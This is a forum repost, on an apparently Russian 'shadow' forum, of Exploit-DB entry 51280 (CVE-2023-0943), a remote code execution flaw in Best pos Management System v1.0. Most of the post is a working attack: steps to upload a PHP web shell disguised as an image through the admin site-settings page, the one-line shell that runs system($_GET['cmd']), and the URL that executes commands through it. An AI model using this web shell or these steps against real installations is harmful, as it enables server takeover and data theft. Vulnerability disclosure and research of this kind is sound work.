Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

24 Май 2023

EDB-ID: 51280

Проверка EDB

Пройдено

Автор: AHMED ISMAIL

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2023-0943

Дата публикации: 2023-04-06

Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload

Код:

# Exploit Title: Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0 
# Tested on: Windows 11
# CVE : (CVE-2023-0943)
### Steps to Reproduce
1- Login as Admin Rule
2- Head to " http://localhost/kruxton/index.php?page=site_settings"
3- Try to Upload an image here it will be a shell.php

```
shell.php
``````
<?php system($_GET['cmd']); ?>
4- Head to http://localhost/kruxton/assets/uploads/
5- Access your uploaded Shell 
http://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami

Источник: www.exploit-db.com

Поиск

Exploit Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload

Exploiter

Похожие темы